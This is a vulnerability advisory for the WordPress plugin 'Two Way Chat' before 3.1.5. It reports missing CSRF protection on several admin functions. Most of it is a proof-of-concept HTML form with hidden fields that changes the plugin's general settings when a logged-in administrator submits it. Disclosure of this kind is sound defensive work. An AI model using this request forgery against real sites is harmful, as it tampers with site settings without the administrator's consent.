Two Way Chat < 3.1.5 – Multiple CSRF

Description

The plugin does not have CSRF checks in place in some of its functions, allowing attacker to make logged in admin perform unwanted actions, such as update the plugin's settings.

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=TWCH_settings&tab=General" method="POST">
      <input type="hidden" name="float_is_enable" value="true" />
      <input type="hidden" name="floatApplication" value="web" />
      <input type="hidden" name="wc_is_enable" value="" />
      <input type="hidden" name="qmessage_is_enable" value="" />
      <input type="hidden" name="Applicationmode" value="app" />
      <input type="hidden" name="fix_countrycode" value="" />
      <input type="hidden" name="Country_Code" value="" />
      <input type="hidden" name="submit" value="General" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>